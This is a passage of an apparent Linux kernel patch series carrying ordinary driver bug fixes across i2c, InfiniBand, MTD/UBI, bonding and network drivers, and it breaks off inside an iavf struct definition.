+-#define BUS_IDLE_MIN_400K_TICKS		139UL
+-#define BUS_IDLE_MIN_1000K_TICKS		133UL
++#define BUS_IDLE_MIN_100K_TICKS		36UL
++#define BUS_IDLE_MIN_400K_TICKS		10UL
++#define BUS_IDLE_MIN_1000K_TICKS	4UL
+ 
+ /*
+  * CTRL_CUM_TIME_OUT_XK_TICKS defines SMBus Controller Cumulative Time-Out.
+  * SMBus Controller Cumulative Time-Out duration =
+  * CTRL_CUM_TIME_OUT_XK_TICKS[7:0] x Baud_Clock_Period x 2048
+  */
+-#define CTRL_CUM_TIME_OUT_100K_TICKS		159
+-#define CTRL_CUM_TIME_OUT_400K_TICKS		159
+-#define CTRL_CUM_TIME_OUT_1000K_TICKS		159
++#define CTRL_CUM_TIME_OUT_100K_TICKS		76
++#define CTRL_CUM_TIME_OUT_400K_TICKS		76
++#define CTRL_CUM_TIME_OUT_1000K_TICKS		76
+ 
+ /*
+  * TARGET_CUM_TIME_OUT_XK_TICKS defines SMBus Target Cumulative Time-Out duration.
+  * SMBus Target Cumulative Time-Out duration = TARGET_CUM_TIME_OUT_XK_TICKS[7:0] x
+  * Baud_Clock_Period x 4096
+  */
+-#define TARGET_CUM_TIME_OUT_100K_TICKS	199
+-#define TARGET_CUM_TIME_OUT_400K_TICKS	199
+-#define TARGET_CUM_TIME_OUT_1000K_TICKS	199
++#define TARGET_CUM_TIME_OUT_100K_TICKS	95
++#define TARGET_CUM_TIME_OUT_400K_TICKS	95
++#define TARGET_CUM_TIME_OUT_1000K_TICKS	95
+ 
+ /*
+  * CLOCK_HIGH_TIME_OUT_XK defines Clock High time out period.
+  * Clock High time out period = CLOCK_HIGH_TIME_OUT_XK[7:0] x Baud_Clock_Period x 8
+  */
+-#define CLOCK_HIGH_TIME_OUT_100K_TICKS	204
+-#define CLOCK_HIGH_TIME_OUT_400K_TICKS	204
+-#define CLOCK_HIGH_TIME_OUT_1000K_TICKS	204
++#define CLOCK_HIGH_TIME_OUT_100K_TICKS	97
++#define CLOCK_HIGH_TIME_OUT_400K_TICKS	97
++#define CLOCK_HIGH_TIME_OUT_1000K_TICKS	97
+ 
+ #define TO_SCALING_100K		\
+ 	((BUS_IDLE_MIN_100K_TICKS << 24) | (CTRL_CUM_TIME_OUT_100K_TICKS << 16) | \
+diff --git a/drivers/i2c/busses/i2c-ocores.c b/drivers/i2c/busses/i2c-ocores.c
+index a0af027db04c1..2e575856c5cd5 100644
+--- a/drivers/i2c/busses/i2c-ocores.c
++++ b/drivers/i2c/busses/i2c-ocores.c
+@@ -342,18 +342,18 @@ static int ocores_poll_wait(struct ocores_i2c *i2c)
+  * ocores_isr(), we just add our polling code around it.
+  *
+  * It can run in atomic context
++ *
++ * Return: 0 on success, -ETIMEDOUT on timeout
+  */
+-static void ocores_process_polling(struct ocores_i2c *i2c)
++static int ocores_process_polling(struct ocores_i2c *i2c)
+ {
+-	while (1) {
+-		irqreturn_t ret;
+-		int err;
++	irqreturn_t ret;
++	int err = 0;
+ 
++	while (1) {
+ 		err = ocores_poll_wait(i2c);
+-		if (err) {
+-			i2c->state = STATE_ERROR;
++		if (err)
+ 			break; /* timeout */
+-		}
+ 
+ 		ret = ocores_isr(-1, i2c);
+ 		if (ret == IRQ_NONE)
+@@ -364,13 +364,15 @@ static void ocores_process_polling(struct ocores_i2c *i2c)
+ 					break;
+ 		}
+ 	}
++
++	return err;
+ }
+ 
+ static int ocores_xfer_core(struct ocores_i2c *i2c,
+ 			    struct i2c_msg *msgs, int num,
+ 			    bool polling)
+ {
+-	int ret;
++	int ret = 0;
+ 	u8 ctrl;
+ 
+ 	ctrl = oc_getreg(i2c, OCI2C_CONTROL);
+@@ -388,15 +390,16 @@ static int ocores_xfer_core(struct ocores_i2c *i2c,
+ 	oc_setreg(i2c, OCI2C_CMD, OCI2C_CMD_START);
+ 
+ 	if (polling) {
+-		ocores_process_polling(i2c);
++		ret = ocores_process_polling(i2c);
+ 	} else {
+-		ret = wait_event_timeout(i2c->wait,
+-					 (i2c->state == STATE_ERROR) ||
+-					 (i2c->state == STATE_DONE), HZ);
+-		if (ret == 0) {
+-			ocores_process_timeout(i2c);
+-			return -ETIMEDOUT;
+-		}
++		if (wait_event_timeout(i2c->wait,
++				       (i2c->state == STATE_ERROR) ||
++				       (i2c->state == STATE_DONE), HZ) == 0)
++			ret = -ETIMEDOUT;
++	}
++	if (ret) {
++		ocores_process_timeout(i2c);
++		return ret;
+ 	}
+ 
+ 	return (i2c->state == STATE_DONE) ? num : -EIO;
+diff --git a/drivers/infiniband/core/cma.c b/drivers/infiniband/core/cma.c
+index 8730674ceb2e1..c6a671edba5c8 100644
+--- a/drivers/infiniband/core/cma.c
++++ b/drivers/infiniband/core/cma.c
+@@ -624,22 +624,11 @@ static inline unsigned short cma_family(struct rdma_id_private *id_priv)
+ 	return id_priv->id.route.addr.src_addr.ss_family;
+ }
+ 
+-static int cma_set_qkey(struct rdma_id_private *id_priv, u32 qkey)
++static int cma_set_default_qkey(struct rdma_id_private *id_priv)
+ {
+ 	struct ib_sa_mcmember_rec rec;
+ 	int ret = 0;
+ 
+-	if (id_priv->qkey) {
+-		if (qkey && id_priv->qkey != qkey)
+-			return -EINVAL;
+-		return 0;
+-	}
+-
+-	if (qkey) {
+-		id_priv->qkey = qkey;
+-		return 0;
+-	}
+-
+ 	switch (id_priv->id.ps) {
+ 	case RDMA_PS_UDP:
+ 	case RDMA_PS_IB:
+@@ -659,6 +648,16 @@ static int cma_set_qkey(struct rdma_id_private *id_priv, u32 qkey)
+ 	return ret;
+ }
+ 
++static int cma_set_qkey(struct rdma_id_private *id_priv, u32 qkey)
++{
++	if (!qkey ||
++	    (id_priv->qkey && (id_priv->qkey != qkey)))
++		return -EINVAL;
++
++	id_priv->qkey = qkey;
++	return 0;
++}
++
+ static void cma_translate_ib(struct sockaddr_ib *sib, struct rdma_dev_addr *dev_addr)
+ {
+ 	dev_addr->dev_type = ARPHRD_INFINIBAND;
+@@ -1229,7 +1228,7 @@ static int cma_ib_init_qp_attr(struct rdma_id_private *id_priv,
+ 	*qp_attr_mask = IB_QP_STATE | IB_QP_PKEY_INDEX | IB_QP_PORT;
+ 
+ 	if (id_priv->id.qp_type == IB_QPT_UD) {
+-		ret = cma_set_qkey(id_priv, 0);
++		ret = cma_set_default_qkey(id_priv);
+ 		if (ret)
+ 			return ret;
+ 
+@@ -4558,7 +4557,10 @@ static int cma_send_sidr_rep(struct rdma_id_private *id_priv,
+ 	memset(&rep, 0, sizeof rep);
+ 	rep.status = status;
+ 	if (status == IB_SIDR_SUCCESS) {
+-		ret = cma_set_qkey(id_priv, qkey);
++		if (qkey)
++			ret = cma_set_qkey(id_priv, qkey);
++		else
++			ret = cma_set_default_qkey(id_priv);
+ 		if (ret)
+ 			return ret;
+ 		rep.qp_num = id_priv->qp_num;
+@@ -4763,9 +4765,7 @@ static void cma_make_mc_event(int status, struct rdma_id_private *id_priv,
+ 	enum ib_gid_type gid_type;
+ 	struct net_device *ndev;
+ 
+-	if (!status)
+-		status = cma_set_qkey(id_priv, be32_to_cpu(multicast->rec.qkey));
+-	else
++	if (status)
+ 		pr_debug_ratelimited("RDMA CM: MULTICAST_ERROR: failed to join multicast. status %d\n",
+ 				     status);
+ 
+@@ -4793,7 +4793,7 @@ static void cma_make_mc_event(int status, struct rdma_id_private *id_priv,
+ 	}
+ 
+ 	event->param.ud.qp_num = 0xFFFFFF;
+-	event->param.ud.qkey = be32_to_cpu(multicast->rec.qkey);
++	event->param.ud.qkey = id_priv->qkey;
+ 
+ out:
+ 	if (ndev)
+@@ -4812,8 +4812,11 @@ static int cma_ib_mc_handler(int status, struct ib_sa_multicast *multicast)
+ 	    READ_ONCE(id_priv->state) == RDMA_CM_DESTROYING)
+ 		goto out;
+ 
+-	cma_make_mc_event(status, id_priv, multicast, &event, mc);
+-	ret = cma_cm_event_handler(id_priv, &event);
++	ret = cma_set_qkey(id_priv, be32_to_cpu(multicast->rec.qkey));
++	if (!ret) {
++		cma_make_mc_event(status, id_priv, multicast, &event, mc);
++		ret = cma_cm_event_handler(id_priv, &event);
++	}
+ 	rdma_destroy_ah_attr(&event.param.ud.ah_attr);
+ 	WARN_ON(ret);
+ 
+@@ -4866,9 +4869,11 @@ static int cma_join_ib_multicast(struct rdma_id_private *id_priv,
+ 	if (ret)
+ 		return ret;
+ 
+-	ret = cma_set_qkey(id_priv, 0);
+-	if (ret)
+-		return ret;
++	if (!id_priv->qkey) {
++		ret = cma_set_default_qkey(id_priv);
++		if (ret)
++			return ret;
++	}
+ 
+ 	cma_set_mgid(id_priv, (struct sockaddr *) &mc->addr, &rec.mgid);
+ 	rec.qkey = cpu_to_be32(id_priv->qkey);
+@@ -4945,9 +4950,6 @@ static int cma_iboe_join_multicast(struct rdma_id_private *id_priv,
+ 	cma_iboe_set_mgid(addr, &ib.rec.mgid, gid_type);
+ 
+ 	ib.rec.pkey = cpu_to_be16(0xffff);
+-	if (id_priv->id.ps == RDMA_PS_UDP)
+-		ib.rec.qkey = cpu_to_be32(RDMA_UDP_QKEY);
+-
+ 	if (dev_addr->bound_dev_if)
+ 		ndev = dev_get_by_index(dev_addr->net, dev_addr->bound_dev_if);
+ 	if (!ndev)
+@@ -4973,6 +4975,9 @@ static int cma_iboe_join_multicast(struct rdma_id_private *id_priv,
+ 	if (err || !ib.rec.mtu)
+ 		return err ?: -EINVAL;
+ 
++	if (!id_priv->qkey)
++		cma_set_default_qkey(id_priv);
++
+ 	rdma_ip2gid((struct sockaddr *)&id_priv->id.route.addr.src_addr,
+ 		    &ib.rec.port_gid);
+ 	INIT_WORK(&mc->iboe_join.work, cma_iboe_join_work_handler);
+@@ -4998,6 +5003,9 @@ int rdma_join_multicast(struct rdma_cm_id *id, struct sockaddr *addr,
+ 			    READ_ONCE(id_priv->state) != RDMA_CM_ADDR_RESOLVED))
+ 		return -EINVAL;
+ 
++	if (id_priv->id.qp_type != IB_QPT_UD)
++		return -EINVAL;
++
+ 	mc = kzalloc(sizeof(*mc), GFP_KERNEL);
+ 	if (!mc)
+ 		return -ENOMEM;
+diff --git a/drivers/infiniband/core/verbs.c b/drivers/infiniband/core/verbs.c
+index 11b1c1603aeb4..b99b3cc283b65 100644
+--- a/drivers/infiniband/core/verbs.c
++++ b/drivers/infiniband/core/verbs.c
+@@ -532,6 +532,8 @@ static struct ib_ah *_rdma_create_ah(struct ib_pd *pd,
+ 	else
+ 		ret = device->ops.create_ah(ah, &init_attr, NULL);
+ 	if (ret) {
++		if (ah->sgid_attr)
++			rdma_put_gid_attr(ah->sgid_attr);
+ 		kfree(ah);
+ 		return ERR_PTR(ret);
+ 	}
+diff --git a/drivers/infiniband/hw/erdma/erdma_hw.h b/drivers/infiniband/hw/erdma/erdma_hw.h
+index e788887732e1f..c533c693e5e38 100644
+--- a/drivers/infiniband/hw/erdma/erdma_hw.h
++++ b/drivers/infiniband/hw/erdma/erdma_hw.h
+@@ -420,7 +420,7 @@ struct erdma_reg_mr_sqe {
+ };
+ 
+ /* EQ related. */
+-#define ERDMA_DEFAULT_EQ_DEPTH 256
++#define ERDMA_DEFAULT_EQ_DEPTH 4096
+ 
+ /* ceqe */
+ #define ERDMA_CEQE_HDR_DB_MASK BIT_ULL(63)
+diff --git a/drivers/infiniband/hw/erdma/erdma_main.c b/drivers/infiniband/hw/erdma/erdma_main.c
+index 49778bb294ae4..49d9319217414 100644
+--- a/drivers/infiniband/hw/erdma/erdma_main.c
++++ b/drivers/infiniband/hw/erdma/erdma_main.c
+@@ -56,7 +56,7 @@ done:
+ static int erdma_enum_and_get_netdev(struct erdma_dev *dev)
+ {
+ 	struct net_device *netdev;
+-	int ret = -ENODEV;
++	int ret = -EPROBE_DEFER;
+ 
+ 	/* Already binded to a net_device, so we skip. */
+ 	if (dev->netdev)
+diff --git a/drivers/infiniband/hw/erdma/erdma_qp.c b/drivers/infiniband/hw/erdma/erdma_qp.c
+index 5fe1a339a4354..e3b0baa703e68 100644
+--- a/drivers/infiniband/hw/erdma/erdma_qp.c
++++ b/drivers/infiniband/hw/erdma/erdma_qp.c
+@@ -402,7 +402,7 @@ static int erdma_push_one_sqe(struct erdma_qp *qp, u16 *pi,
+ 			FIELD_PREP(ERDMA_SQE_MR_MTT_CNT_MASK,
+ 				   mr->mem.mtt_nents);
+ 
+-		if (mr->mem.mtt_nents < ERDMA_MAX_INLINE_MTT_ENTRIES) {
++		if (mr->mem.mtt_nents <= ERDMA_MAX_INLINE_MTT_ENTRIES) {
+ 			attrs |= FIELD_PREP(ERDMA_SQE_MR_MTT_TYPE_MASK, 0);
+ 			/* Copy SGLs to SQE content to accelerate */
+ 			memcpy(get_queue_entry(qp->kern_qp.sq_buf, idx + 1,
+diff --git a/drivers/infiniband/hw/erdma/erdma_verbs.h b/drivers/infiniband/hw/erdma/erdma_verbs.h
+index ab6380635e9e6..eabab8bba95af 100644
+--- a/drivers/infiniband/hw/erdma/erdma_verbs.h
++++ b/drivers/infiniband/hw/erdma/erdma_verbs.h
+@@ -11,7 +11,7 @@
+ 
+ /* RDMA Capability. */
+ #define ERDMA_MAX_PD (128 * 1024)
+-#define ERDMA_MAX_SEND_WR 4096
++#define ERDMA_MAX_SEND_WR 8192
+ #define ERDMA_MAX_ORD 128
+ #define ERDMA_MAX_IRD 128
+ #define ERDMA_MAX_SGE_RD 1
+diff --git a/drivers/infiniband/hw/irdma/cm.c b/drivers/infiniband/hw/irdma/cm.c
+index 195aa9ea18b6c..8817864154af1 100644
+--- a/drivers/infiniband/hw/irdma/cm.c
++++ b/drivers/infiniband/hw/irdma/cm.c
+@@ -1458,13 +1458,15 @@ static int irdma_send_fin(struct irdma_cm_node *cm_node)
+  * irdma_find_listener - find a cm node listening on this addr-port pair
+  * @cm_core: cm's core
+  * @dst_addr: listener ip addr
++ * @ipv4: flag indicating IPv4 when true
+  * @dst_port: listener tcp port num
+  * @vlan_id: virtual LAN ID
+  * @listener_state: state to match with listen node's
+  */
+ static struct irdma_cm_listener *
+-irdma_find_listener(struct irdma_cm_core *cm_core, u32 *dst_addr, u16 dst_port,
+-		    u16 vlan_id, enum irdma_cm_listener_state listener_state)
++irdma_find_listener(struct irdma_cm_core *cm_core, u32 *dst_addr, bool ipv4,
++		    u16 dst_port, u16 vlan_id,
++		    enum irdma_cm_listener_state listener_state)
+ {
+ 	struct irdma_cm_listener *listen_node;
+ 	static const u32 ip_zero[4] = { 0, 0, 0, 0 };
+@@ -1477,7 +1479,7 @@ irdma_find_listener(struct irdma_cm_core *cm_core, u32 *dst_addr, u16 dst_port,
+ 	list_for_each_entry (listen_node, &cm_core->listen_list, list) {
+ 		memcpy(listen_addr, listen_node->loc_addr, sizeof(listen_addr));
+ 		listen_port = listen_node->loc_port;
+-		if (listen_port != dst_port ||
++		if (listen_node->ipv4 != ipv4 || listen_port != dst_port ||
+ 		    !(listener_state & listen_node->listener_state))
+ 			continue;
+ 		/* compare node pair, return node handle if a match */
+@@ -2902,9 +2904,10 @@ irdma_make_listen_node(struct irdma_cm_core *cm_core,
+ 	unsigned long flags;
+ 
+ 	/* cannot have multiple matching listeners */
+-	listener = irdma_find_listener(cm_core, cm_info->loc_addr,
+-				       cm_info->loc_port, cm_info->vlan_id,
+-				       IRDMA_CM_LISTENER_EITHER_STATE);
++	listener =
++		irdma_find_listener(cm_core, cm_info->loc_addr, cm_info->ipv4,
++				    cm_info->loc_port, cm_info->vlan_id,
++				    IRDMA_CM_LISTENER_EITHER_STATE);
+ 	if (listener &&
+ 	    listener->listener_state == IRDMA_CM_LISTENER_ACTIVE_STATE) {
+ 		refcount_dec(&listener->refcnt);
+@@ -3153,6 +3156,7 @@ void irdma_receive_ilq(struct irdma_sc_vsi *vsi, struct irdma_puda_buf *rbuf)
+ 
+ 		listener = irdma_find_listener(cm_core,
+ 					       cm_info.loc_addr,
++					       cm_info.ipv4,
+ 					       cm_info.loc_port,
+ 					       cm_info.vlan_id,
+ 					       IRDMA_CM_LISTENER_ACTIVE_STATE);
+diff --git a/drivers/infiniband/hw/irdma/cm.h b/drivers/infiniband/hw/irdma/cm.h
+index 19c284975fc7c..7feadb3e1eda3 100644
+--- a/drivers/infiniband/hw/irdma/cm.h
++++ b/drivers/infiniband/hw/irdma/cm.h
+@@ -41,7 +41,7 @@
+ #define TCP_OPTIONS_PADDING	3
+ 
+ #define IRDMA_DEFAULT_RETRYS	64
+-#define IRDMA_DEFAULT_RETRANS	8
++#define IRDMA_DEFAULT_RETRANS	32
+ #define IRDMA_DEFAULT_TTL		0x40
+ #define IRDMA_DEFAULT_RTT_VAR		6
+ #define IRDMA_DEFAULT_SS_THRESH		0x3fffffff
+diff --git a/drivers/infiniband/hw/irdma/hw.c b/drivers/infiniband/hw/irdma/hw.c
+index 2e1e2bad04011..43dfa4761f069 100644
+--- a/drivers/infiniband/hw/irdma/hw.c
++++ b/drivers/infiniband/hw/irdma/hw.c
+@@ -41,6 +41,7 @@ static enum irdma_hmc_rsrc_type iw_hmc_obj_types[] = {
+ 	IRDMA_HMC_IW_XFFL,
+ 	IRDMA_HMC_IW_Q1,
+ 	IRDMA_HMC_IW_Q1FL,
++	IRDMA_HMC_IW_PBLE,
+ 	IRDMA_HMC_IW_TIMER,
+ 	IRDMA_HMC_IW_FSIMC,
+ 	IRDMA_HMC_IW_FSIAV,
+@@ -827,6 +828,8 @@ static int irdma_create_hmc_objs(struct irdma_pci_f *rf, bool privileged,
+ 	info.entry_type = rf->sd_type;
+ 
+ 	for (i = 0; i < IW_HMC_OBJ_TYPE_NUM; i++) {
++		if (iw_hmc_obj_types[i] == IRDMA_HMC_IW_PBLE)
++			continue;
+ 		if (dev->hmc_info->hmc_obj[iw_hmc_obj_types[i]].cnt) {
+ 			info.rsrc_type = iw_hmc_obj_types[i];
+ 			info.count = dev->hmc_info->hmc_obj[info.rsrc_type].cnt;
+diff --git a/drivers/infiniband/hw/irdma/utils.c b/drivers/infiniband/hw/irdma/utils.c
+index 445e69e864097..7887230c867b1 100644
+--- a/drivers/infiniband/hw/irdma/utils.c
++++ b/drivers/infiniband/hw/irdma/utils.c
+@@ -2595,7 +2595,10 @@ void irdma_generate_flush_completions(struct irdma_qp *iwqp)
+ 			/* remove the SQ WR by moving SQ tail*/
+ 			IRDMA_RING_SET_TAIL(*sq_ring,
+ 				sq_ring->tail + qp->sq_wrtrk_array[sq_ring->tail].quanta);
+-
++			if (cmpl->cpi.op_type == IRDMAQP_OP_NOP) {
++				kfree(cmpl);
++				continue;
++			}
+ 			ibdev_dbg(iwqp->iwscq->ibcq.device,
+ 				  "DEV: %s: adding wr_id = 0x%llx SQ Completion to list qp_id=%d\n",
+ 				  __func__, cmpl->cpi.wr_id, qp->qp_id);
+diff --git a/drivers/infiniband/hw/mlx5/main.c b/drivers/infiniband/hw/mlx5/main.c
+index c669ef6e47e73..eaa35e1df2a85 100644
+--- a/drivers/infiniband/hw/mlx5/main.c
++++ b/drivers/infiniband/hw/mlx5/main.c
+@@ -442,6 +442,10 @@ static int translate_eth_ext_proto_oper(u32 eth_proto_oper, u16 *active_speed,
+ 		*active_width = IB_WIDTH_2X;
+ 		*active_speed = IB_SPEED_NDR;
+ 		break;
++	case MLX5E_PROT_MASK(MLX5E_400GAUI_8):
++		*active_width = IB_WIDTH_8X;
++		*active_speed = IB_SPEED_HDR;
++		break;
+ 	case MLX5E_PROT_MASK(MLX5E_400GAUI_4_400GBASE_CR4_KR4):
+ 		*active_width = IB_WIDTH_4X;
+ 		*active_speed = IB_SPEED_NDR;
+diff --git a/drivers/mtd/mtdblock.c b/drivers/mtd/mtdblock.c
+index 1e94e7d10b8be..a0a1194dc1d90 100644
+--- a/drivers/mtd/mtdblock.c
++++ b/drivers/mtd/mtdblock.c
+@@ -153,7 +153,7 @@ static int do_cached_write (struct mtdblk_dev *mtdblk, unsigned long pos,
+ 				mtdblk->cache_state = STATE_EMPTY;
+ 				ret = mtd_read(mtd, sect_start, sect_size,
+ 					       &retlen, mtdblk->cache_data);
+-				if (ret)
++				if (ret && !mtd_is_bitflip(ret))
+ 					return ret;
+ 				if (retlen != sect_size)
+ 					return -EIO;
+@@ -188,8 +188,12 @@ static int do_cached_read (struct mtdblk_dev *mtdblk, unsigned long pos,
+ 	pr_debug("mtdblock: read on \"%s\" at 0x%lx, size 0x%x\n",
+ 			mtd->name, pos, len);
+ 
+-	if (!sect_size)
+-		return mtd_read(mtd, pos, len, &retlen, buf);
++	if (!sect_size) {
++		ret = mtd_read(mtd, pos, len, &retlen, buf);
++		if (ret && !mtd_is_bitflip(ret))
++			return ret;
++		return 0;
++	}
+ 
+ 	while (len > 0) {
+ 		unsigned long sect_start = (pos/sect_size)*sect_size;
+@@ -209,7 +213,7 @@ static int do_cached_read (struct mtdblk_dev *mtdblk, unsigned long pos,
+ 			memcpy (buf, mtdblk->cache_data + offset, size);
+ 		} else {
+ 			ret = mtd_read(mtd, pos, size, &retlen, buf);
+-			if (ret)
++			if (ret && !mtd_is_bitflip(ret))
+ 				return ret;
+ 			if (retlen != size)
+ 				return -EIO;
+diff --git a/drivers/mtd/nand/raw/meson_nand.c b/drivers/mtd/nand/raw/meson_nand.c
+index a28574c009003..074e14225c06a 100644
+--- a/drivers/mtd/nand/raw/meson_nand.c
++++ b/drivers/mtd/nand/raw/meson_nand.c
+@@ -280,7 +280,7 @@ static void meson_nfc_cmd_access(struct nand_chip *nand, int raw, bool dir,
+ 
+ 	if (raw) {
+ 		len = mtd->writesize + mtd->oobsize;
+-		cmd = (len & GENMASK(5, 0)) | scrambler | DMA_DIR(dir);
++		cmd = (len & GENMASK(13, 0)) | scrambler | DMA_DIR(dir);
+ 		writel(cmd, nfc->reg_base + NFC_REG_CMD);
+ 		return;
+ 	}
+@@ -544,7 +544,7 @@ static int meson_nfc_read_buf(struct nand_chip *nand, u8 *buf, int len)
+ 	if (ret)
+ 		goto out;
+ 
+-	cmd = NFC_CMD_N2M | (len & GENMASK(5, 0));
++	cmd = NFC_CMD_N2M | (len & GENMASK(13, 0));
+ 	writel(cmd, nfc->reg_base + NFC_REG_CMD);
+ 
+ 	meson_nfc_drain_cmd(nfc);
+@@ -568,7 +568,7 @@ static int meson_nfc_write_buf(struct nand_chip *nand, u8 *buf, int len)
+ 	if (ret)
+ 		return ret;
+ 
+-	cmd = NFC_CMD_M2N | (len & GENMASK(5, 0));
++	cmd = NFC_CMD_M2N | (len & GENMASK(13, 0));
+ 	writel(cmd, nfc->reg_base + NFC_REG_CMD);
+ 
+ 	meson_nfc_drain_cmd(nfc);
+diff --git a/drivers/mtd/nand/raw/stm32_fmc2_nand.c b/drivers/mtd/nand/raw/stm32_fmc2_nand.c
+index 5d627048c420d..9e74bcd90aaa2 100644
+--- a/drivers/mtd/nand/raw/stm32_fmc2_nand.c
++++ b/drivers/mtd/nand/raw/stm32_fmc2_nand.c
+@@ -1531,6 +1531,9 @@ static int stm32_fmc2_nfc_setup_interface(struct nand_chip *chip, int chipnr,
+ 	if (IS_ERR(sdrt))
+ 		return PTR_ERR(sdrt);
+ 
++	if (conf->timings.mode > 3)
++		return -EOPNOTSUPP;
++
+ 	if (chipnr == NAND_DATA_IFACE_CHECK_ONLY)
+ 		return 0;
+ 
+diff --git a/drivers/mtd/ubi/build.c b/drivers/mtd/ubi/build.c
+index 7f65af1697519..1662c12e24ada 100644
+--- a/drivers/mtd/ubi/build.c
++++ b/drivers/mtd/ubi/build.c
+@@ -664,12 +664,6 @@ static int io_init(struct ubi_device *ubi, int max_beb_per1024)
+ 	ubi->ec_hdr_alsize = ALIGN(UBI_EC_HDR_SIZE, ubi->hdrs_min_io_size);
+ 	ubi->vid_hdr_alsize = ALIGN(UBI_VID_HDR_SIZE, ubi->hdrs_min_io_size);
+ 
+-	if (ubi->vid_hdr_offset && ((ubi->vid_hdr_offset + UBI_VID_HDR_SIZE) >
+-	    ubi->vid_hdr_alsize)) {
+-		ubi_err(ubi, "VID header offset %d too large.", ubi->vid_hdr_offset);
+-		return -EINVAL;
+-	}
+-
+ 	dbg_gen("min_io_size      %d", ubi->min_io_size);
+ 	dbg_gen("max_write_size   %d", ubi->max_write_size);
+ 	dbg_gen("hdrs_min_io_size %d", ubi->hdrs_min_io_size);
+@@ -687,6 +681,21 @@ static int io_init(struct ubi_device *ubi, int max_beb_per1024)
+ 						ubi->vid_hdr_aloffset;
+ 	}
+ 
++	/*
++	 * Memory allocation for VID header is ubi->vid_hdr_alsize
++	 * which is described in comments in io.c.
++	 * Make sure VID header shift + UBI_VID_HDR_SIZE not exceeds
++	 * ubi->vid_hdr_alsize, so that all vid header operations
++	 * won't access memory out of bounds.
++	 */
++	if ((ubi->vid_hdr_shift + UBI_VID_HDR_SIZE) > ubi->vid_hdr_alsize) {
++		ubi_err(ubi, "Invalid VID header offset %d, VID header shift(%d)"
++			" + VID header size(%zu) > VID header aligned size(%d).",
++			ubi->vid_hdr_offset, ubi->vid_hdr_shift,
++			UBI_VID_HDR_SIZE, ubi->vid_hdr_alsize);
++		return -EINVAL;
++	}
++
+ 	/* Similar for the data offset */
+ 	ubi->leb_start = ubi->vid_hdr_offset + UBI_VID_HDR_SIZE;
+ 	ubi->leb_start = ALIGN(ubi->leb_start, ubi->min_io_size);
+diff --git a/drivers/mtd/ubi/wl.c b/drivers/mtd/ubi/wl.c
+index 9e14319225c97..6049ab9e46479 100644
+--- a/drivers/mtd/ubi/wl.c
++++ b/drivers/mtd/ubi/wl.c
+@@ -575,7 +575,7 @@ static int erase_worker(struct ubi_device *ubi, struct ubi_work *wl_wrk,
+  * @vol_id: the volume ID that last used this PEB
+  * @lnum: the last used logical eraseblock number for the PEB
+  * @torture: if the physical eraseblock has to be tortured
+- * @nested: denotes whether the work_sem is already held in read mode
++ * @nested: denotes whether the work_sem is already held
+  *
+  * This function returns zero in case of success and a %-ENOMEM in case of
+  * failure.
+@@ -1131,7 +1131,7 @@ static int __erase_worker(struct ubi_device *ubi, struct ubi_work *wl_wrk)
+ 		int err1;
+ 
+ 		/* Re-schedule the LEB for erasure */
+-		err1 = schedule_erase(ubi, e, vol_id, lnum, 0, false);
++		err1 = schedule_erase(ubi, e, vol_id, lnum, 0, true);
+ 		if (err1) {
+ 			spin_lock(&ubi->wl_lock);
+ 			wl_entry_destroy(ubi, e);
+diff --git a/drivers/net/bonding/bond_main.c b/drivers/net/bonding/bond_main.c
+index 45d3cb557de73..9f6824a6537bc 100644
+--- a/drivers/net/bonding/bond_main.c
++++ b/drivers/net/bonding/bond_main.c
+@@ -3266,7 +3266,8 @@ static int bond_na_rcv(const struct sk_buff *skb, struct bonding *bond,
+ 
+ 	combined = skb_header_pointer(skb, 0, sizeof(_combined), &_combined);
+ 	if (!combined || combined->ip6.nexthdr != NEXTHDR_ICMP ||
+-	    combined->icmp6.icmp6_type != NDISC_NEIGHBOUR_ADVERTISEMENT)
++	    (combined->icmp6.icmp6_type != NDISC_NEIGHBOUR_SOLICITATION &&
++	     combined->icmp6.icmp6_type != NDISC_NEIGHBOUR_ADVERTISEMENT))
+ 		goto out;
+ 
+ 	saddr = &combined->ip6.saddr;
+@@ -3288,7 +3289,7 @@ static int bond_na_rcv(const struct sk_buff *skb, struct bonding *bond,
+ 	else if (curr_active_slave &&
+ 		 time_after(slave_last_rx(bond, curr_active_slave),
+ 			    curr_active_slave->last_link_up))
+-		bond_validate_na(bond, slave, saddr, daddr);
++		bond_validate_na(bond, slave, daddr, saddr);
+ 	else if (curr_arp_slave &&
+ 		 bond_time_in_interval(bond, slave_last_tx(curr_arp_slave), 1))
+ 		bond_validate_na(bond, slave, saddr, daddr);
+diff --git a/drivers/net/ethernet/cadence/macb_main.c b/drivers/net/ethernet/cadence/macb_main.c
+index e255780f3867c..abd6cc0cd641f 100644
+--- a/drivers/net/ethernet/cadence/macb_main.c
++++ b/drivers/net/ethernet/cadence/macb_main.c
+@@ -1010,6 +1010,10 @@ static dma_addr_t macb_get_addr(struct macb *bp, struct macb_dma_desc *desc)
+ 	}
+ #endif
+ 	addr |= MACB_BF(RX_WADDR, MACB_BFEXT(RX_WADDR, desc->addr));
++#ifdef CONFIG_MACB_USE_HWSTAMP
++	if (bp->hw_dma_cap & HW_DMA_CAP_PTP)
++		addr &= ~GEM_BIT(DMA_RXVALID);
++#endif
+ 	return addr;
+ }
+ 
+diff --git a/drivers/net/ethernet/intel/iavf/iavf.h b/drivers/net/ethernet/intel/iavf/iavf.h
+index 2a9f1eeeb7015..93a998f169de7 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf.h
++++ b/drivers/net/ethernet/intel/iavf/iavf.h
+@@ -58,8 +58,6 @@ enum iavf_vsi_state_t {
+ struct iavf_vsi {
+ 	struct iavf_adapter *back;
+ 	struct net_device *netdev;
+-	unsigned long active_cvlans[BITS_TO_LONGS(VLAN_N_VID)];
+-	unsigned long active_svlans[BITS_TO_LONGS(VLAN_N_VID)];
+ 	u16 seid;
+ 	u16 id;
+ 	DECLARE_BITMAP(state, __IAVF_VSI_STATE_SIZE__);
+@@ -157,15 +155,20 @@ struct iavf_vlan {
+ 	u16 tpid;
+ };
+ 
++enum iavf_vlan_state_t {
++	IAVF_VLAN_INVALID,
++	IAVF_VLAN_ADD,		/* filter needs to be added */
++	IAVF_VLAN_IS_NEW,	/* filter is new, wait for PF answer */
++	IAVF_VLAN_ACTIVE,	/* filter is accepted by PF */
++	IAVF_VLAN_DISABLE,	/* filter needs to be deleted by PF, then marked INACTIVE */
++	IAVF_VLAN_INACTIVE,	/* filter is inactive, we are in IFF_DOWN */
++	IAVF_VLAN_REMOVE,	/* filter needs to be removed from list */
++};
++
+ struct iavf_vlan_filter {
+ 	struct list_head list;
+ 	struct iavf_vlan vlan;
+-	struct {
